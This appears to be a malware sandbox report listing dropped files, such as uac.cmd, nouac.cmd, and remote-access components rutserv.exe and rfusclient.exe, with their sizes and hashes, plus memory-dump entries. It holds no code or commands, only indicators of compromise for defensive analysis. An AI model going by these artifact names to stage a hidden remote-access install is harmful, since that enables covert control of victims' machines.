SHA512
d38a50d52cea88a32497ed2ac242308abef6740ecf603f7c1af16812901f32c94255da4586253a6feb07f9bffc20a26c2cc4dc580654601e5b29e4af488ef273

Download Submit
C:\Users\Admin\AppData\Local\Temp\nouac.cmd

Filesize
10KB

MD5
383dec4925ef46ea838ea39f26f9136a

SHA1
98b038bd3e5166d3a7775ab1a90f3c889d86f4df

SHA256
5c0817a79b04099510fa5658311ff677531595ac44edbbf2e993f5afb5e0a3c1

SHA512
ce8e2b3fe5867391906498ee2ba0fa99ffeedb291b75a9b2a45f968b795530c5f4bd6932b2f2c71e3fd308c8b977bb9bc234e5a6a7cfa582ebf88063726d92cb

Download Submit
C:\Users\Admin\AppData\Local\Temp\rfusclient.exe

Filesize
1.5MB

MD5
7dcf2fb7158409c2dc1213f5fbb0b110

SHA1
0f301369063870fc8304ea7f3c61e5a76fa2be81

SHA256
dc23bcd7a6a2059709418bdc4bb72fa6e0360d311e7fb437885798129956db69

SHA512
143d0cf890f473a34f3a6b111f6530bbb9ff35d41aae725092775f714af548720854e9506f0a92a404cf3019d85ba97524c93d929fdb8cf9438e6fb6e46891fa

Download Submit
C:\Users\Admin\AppData\Local\Temp\rutserv.exe

Filesize
1.7MB

MD5
8880e0e1c9f1da077c912d4b1a0b9e4a

SHA1
4ef63d511168c377ab3b76424acae88f74fea174

SHA256
12c9d41ea0cac3fd086632f005958ef50e86252d4d562c2d2fee9428aa4cfb99

SHA512
81becd053723825442d0cddec0062f273a9222317c09779297e64f4272195ce236374a743c3bb147ac885af909dd0e26c2e5ca928fb37594bb14177e7ff51625

Download Submit
C:\Users\Admin\AppData\Local\Temp\uac.cmd

Filesize
10KB

MD5
25843073fca2de35e3e66ffac4b5b258

SHA1
d190cd65796c62261e55fb6a5b606614e35473d1

SHA256
4405c37fda1990152cba1387ecd51b834d2430905bb8a62fd9d303e9920c1220

SHA512
828a3276e9cba8695245a0718f8b8196ef437b163def7b7d96e2b2d456ea3677e813a3c3262bb703ccf974e9add6425b2339911c4700c1423465c729827ea2ef

Download Submit
C:\Users\Admin\AppData\Local\Temp\vp8decoder.dll

Filesize
127KB

MD5
bda3c03c3e5d65922a311009e0ae8cd6

SHA1
37093c457ac5f01649b4d23a3d075a531af08baa

SHA256
30dc5a63a43a00fb3bcacb696656dc302b9c090cf9c05df0f10123703ca07290

SHA512
eab8356896f05952e1bdfca467e998b23e5a9a5e5245f13d201f9b87b7a450be628c3513a8a4c40fa50ffaa8491c4508f1215c57ac608dd3e5e67290a5bedc0b

Download Submit
C:\Users\Admin\AppData\Local\Temp\vp8encoder.dll

Filesize
238KB

MD5
200cba4b9cbdd64f1a281b89cd1467f3

SHA1
fc3ccf8d57efcdc0d22b61ff6e49798d551a9118

SHA256
c8529cff46283d4f7050c9f4ba42a6aad6ff580a22fc8f72bbedb17e63d4091e

SHA512
15a213790da6ddedc25369216ae725dccd16473599a8d5fd8b90f80aaa4fd20496f80e85a4ee5eae6a330930207cefc644ab704f7a6514bbf781151a38be38e3

Download Submit
C:\Users\Admin\AppData\Local\Temp\webmmux.dll

Filesize
90KB

MD5
aa78ed008f72533c7136bf6d4bddb0d0

SHA1
2e9abd74e615adc99f561cbdbe6067dfd81a406a

SHA256
41e551ecb07620b4cace94a89bbcff6597df85a571ace50a7df929c9a94f1d11

SHA512
e9f49bc94909c46ae6dad9368e13cc758ff801c39ea8a459483bd17a8a40664b68c91d8602da588a84a39de9256e0accafb23a7667fb57640a55280ee61f4021

Download Submit
C:\Users\Admin\AppData\Local\Temp\webmvorbisdecoder.dll

Filesize
141KB

MD5
0867a260483876336a727cf9f2928b13

SHA1
3c8c59bfba6ed2aeef35c0d1fc4689683df1e660

SHA256
cbc192c03b91280eb4561386290e3b346147d5b1362224d1deff781ff89be207

SHA512
b1d2518adb513c42ed877f1ee77d227d6d3600fc27b4d747f31b75cbfb85c53802cbf9b1fe0e1d09353ea4c29b6a49d5e7b7967b3fd8d15974d822649ca7a83f

Download Submit
C:\Users\Admin\AppData\Local\Temp\webmvorbisencoder.dll

Filesize
202KB

MD5
43adc4acd56c56b0a25664954c7aa80c

SHA1
d9085625b4a39b3969db8047ad3224b3fc9f60fc

SHA256
0e33c9f15b53de632108ef6f7275cd4d980df86a408f330c57f717b7d5fa3918

SHA512
346dd9da1fe6be5219cb10cbe54c60a1661c5c06a21f3cf864a3f32121a90d29ea1bbcef33d2766811f3ef3242456c2c9606326c26d8b660fa26ff4ae8b24515

Download Submit
C:\Windows\spom\rfusclient.exe

Filesize
1.5MB

MD5
7dcf2fb7158409c2dc1213f5fbb0b110

SHA1
0f301369063870fc8304ea7f3c61e5a76fa2be81

SHA256
dc23bcd7a6a2059709418bdc4bb72fa6e0360d311e7fb437885798129956db69

SHA512
143d0cf890f473a34f3a6b111f6530bbb9ff35d41aae725092775f714af548720854e9506f0a92a404cf3019d85ba97524c93d929fdb8cf9438e6fb6e46891fa

Download Submit
C:\Windows\spom\rfusclient.exe

Filesize
1.5MB

MD5
7dcf2fb7158409c2dc1213f5fbb0b110

SHA1
0f301369063870fc8304ea7f3c61e5a76fa2be81

SHA256
dc23bcd7a6a2059709418bdc4bb72fa6e0360d311e7fb437885798129956db69

SHA512
143d0cf890f473a34f3a6b111f6530bbb9ff35d41aae725092775f714af548720854e9506f0a92a404cf3019d85ba97524c93d929fdb8cf9438e6fb6e46891fa

Download Submit
C:\Windows\spom\rfusclient.exe

Filesize
1.5MB

MD5
7dcf2fb7158409c2dc1213f5fbb0b110

SHA1
0f301369063870fc8304ea7f3c61e5a76fa2be81

SHA256
dc23bcd7a6a2059709418bdc4bb72fa6e0360d311e7fb437885798129956db69

SHA512
143d0cf890f473a34f3a6b111f6530bbb9ff35d41aae725092775f714af548720854e9506f0a92a404cf3019d85ba97524c93d929fdb8cf9438e6fb6e46891fa

Download Submit
C:\Windows\spom\rfusclient.exe

Filesize
1.5MB

MD5
7dcf2fb7158409c2dc1213f5fbb0b110

SHA1
0f301369063870fc8304ea7f3c61e5a76fa2be81

SHA256
dc23bcd7a6a2059709418bdc4bb72fa6e0360d311e7fb437885798129956db69

SHA512
143d0cf890f473a34f3a6b111f6530bbb9ff35d41aae725092775f714af548720854e9506f0a92a404cf3019d85ba97524c93d929fdb8cf9438e6fb6e46891fa

Download Submit
C:\Windows\spom\rutserv.exe

Filesize
1.7MB

MD5
8880e0e1c9f1da077c912d4b1a0b9e4a

SHA1
4ef63d511168c377ab3b76424acae88f74fea174

SHA256
12c9d41ea0cac3fd086632f005958ef50e86252d4d562c2d2fee9428aa4cfb99

SHA512
81becd053723825442d0cddec0062f273a9222317c09779297e64f4272195ce236374a743c3bb147ac885af909dd0e26c2e5ca928fb37594bb14177e7ff51625

Download Submit
C:\Windows\spom\rutserv.exe

Filesize
1.7MB

MD5
8880e0e1c9f1da077c912d4b1a0b9e4a

SHA1
4ef63d511168c377ab3b76424acae88f74fea174

SHA256
12c9d41ea0cac3fd086632f005958ef50e86252d4d562c2d2fee9428aa4cfb99

SHA512
81becd053723825442d0cddec0062f273a9222317c09779297e64f4272195ce236374a743c3bb147ac885af909dd0e26c2e5ca928fb37594bb14177e7ff51625

Download Submit
C:\Windows\spom\rutserv.exe

Filesize
1.7MB

MD5
8880e0e1c9f1da077c912d4b1a0b9e4a

SHA1
4ef63d511168c377ab3b76424acae88f74fea174

SHA256
12c9d41ea0cac3fd086632f005958ef50e86252d4d562c2d2fee9428aa4cfb99

SHA512
81becd053723825442d0cddec0062f273a9222317c09779297e64f4272195ce236374a743c3bb147ac885af909dd0e26c2e5ca928fb37594bb14177e7ff51625

Download Submit
C:\Windows\spom\rutserv.exe

Filesize
1.7MB

MD5
8880e0e1c9f1da077c912d4b1a0b9e4a

SHA1
4ef63d511168c377ab3b76424acae88f74fea174

SHA256
12c9d41ea0cac3fd086632f005958ef50e86252d4d562c2d2fee9428aa4cfb99

SHA512
81becd053723825442d0cddec0062f273a9222317c09779297e64f4272195ce236374a743c3bb147ac885af909dd0e26c2e5ca928fb37594bb14177e7ff51625

Download Submit
C:\Windows\spom\rutserv.exe

Filesize
1.7MB

MD5
8880e0e1c9f1da077c912d4b1a0b9e4a

SHA1
4ef63d511168c377ab3b76424acae88f74fea174

SHA256
12c9d41ea0cac3fd086632f005958ef50e86252d4d562c2d2fee9428aa4cfb99

SHA512
81becd053723825442d0cddec0062f273a9222317c09779297e64f4272195ce236374a743c3bb147ac885af909dd0e26c2e5ca928fb37594bb14177e7ff51625

Download Submit
C:\Windows\spom\vp8decoder.dll

Filesize
127KB

MD5
bda3c03c3e5d65922a311009e0ae8cd6

SHA1
37093c457ac5f01649b4d23a3d075a531af08baa

SHA256
30dc5a63a43a00fb3bcacb696656dc302b9c090cf9c05df0f10123703ca07290

SHA512
eab8356896f05952e1bdfca467e998b23e5a9a5e5245f13d201f9b87b7a450be628c3513a8a4c40fa50ffaa8491c4508f1215c57ac608dd3e5e67290a5bedc0b

Download Submit
C:\Windows\spom\vp8encoder.dll

Filesize
238KB

MD5
200cba4b9cbdd64f1a281b89cd1467f3

SHA1
fc3ccf8d57efcdc0d22b61ff6e49798d551a9118

SHA256
c8529cff46283d4f7050c9f4ba42a6aad6ff580a22fc8f72bbedb17e63d4091e

SHA512
15a213790da6ddedc25369216ae725dccd16473599a8d5fd8b90f80aaa4fd20496f80e85a4ee5eae6a330930207cefc644ab704f7a6514bbf781151a38be38e3

Download Submit
C:\Windows\spom\webmmux.dll

Filesize
90KB

MD5
aa78ed008f72533c7136bf6d4bddb0d0

SHA1
2e9abd74e615adc99f561cbdbe6067dfd81a406a

SHA256
41e551ecb07620b4cace94a89bbcff6597df85a571ace50a7df929c9a94f1d11

SHA512
e9f49bc94909c46ae6dad9368e13cc758ff801c39ea8a459483bd17a8a40664b68c91d8602da588a84a39de9256e0accafb23a7667fb57640a55280ee61f4021

Download Submit
C:\Windows\spom\webmvorbisdecoder.dll

Filesize
141KB

MD5
0867a260483876336a727cf9f2928b13

SHA1
3c8c59bfba6ed2aeef35c0d1fc4689683df1e660

SHA256
cbc192c03b91280eb4561386290e3b346147d5b1362224d1deff781ff89be207

SHA512
b1d2518adb513c42ed877f1ee77d227d6d3600fc27b4d747f31b75cbfb85c53802cbf9b1fe0e1d09353ea4c29b6a49d5e7b7967b3fd8d15974d822649ca7a83f

Download Submit
C:\Windows\spom\webmvorbisencoder.dll

Filesize
202KB

MD5
43adc4acd56c56b0a25664954c7aa80c

SHA1
d9085625b4a39b3969db8047ad3224b3fc9f60fc

SHA256
0e33c9f15b53de632108ef6f7275cd4d980df86a408f330c57f717b7d5fa3918

SHA512
346dd9da1fe6be5219cb10cbe54c60a1661c5c06a21f3cf864a3f32121a90d29ea1bbcef33d2766811f3ef3242456c2c9606326c26d8b660fa26ff4ae8b24515

Download Submit
memory/812-195-0x0000000000400000-0x00000000009DD000-memory.dmp

Filesize
5.9MB

Download
memory/812-196-0x0000000000400000-0x00000000009DD000-memory.dmp

Filesize
5.9MB

Download
memory/1484-188-0x0000000000400000-0x00000000009DD000-memory.dmp

Filesize
5.9MB

Download
memory/1484-191-0x0000000000400000-0x00000000009DD000-memory.dmp

Filesize
5.9MB

Download
memory/1796-132-0x0000000000400000-0x000000000042B000-memory.dmp

Filesize
172KB

Download
memory/1796-137-0x0000000000400000-0x000000000042B000-memory.dmp

Filesize
172KB

Download
memory/1844-190-0x0000000000400000-0x0000000000ABF000-memory.dmp

Filesize
6.7MB

Download
memory/1844-187-0x0000000000400000-0x0000000000ABF000-memory.dmp

Filesize
6.7MB

Download
memory/2084-189-0x0000000000400000-0x0000000000ABF000-memory.dmp

Filesize
6.7MB

Download
memory/2084-186-0x0000000000400000-0x0000000000ABF000-memory.dmp

Filesize
6.7MB

Download
memory/3468-192-0x0000000000400000-0x00000000009DD000-memory.dmp

Filesize
5.9MB

Download
memory/4320-165-0x0000000000400000-0x0000000000ABF000-memory.dmp

Filesize
6.7MB

Download
memory/4568-162-0x0000000000400000-0x0000000000ABF000-memory.dmp

Filesize
6.7MB

Download
memory/4568-161-0x0000000000400000-0x0000000000ABF000-memory.dmp

Filesize
6.7MB

Download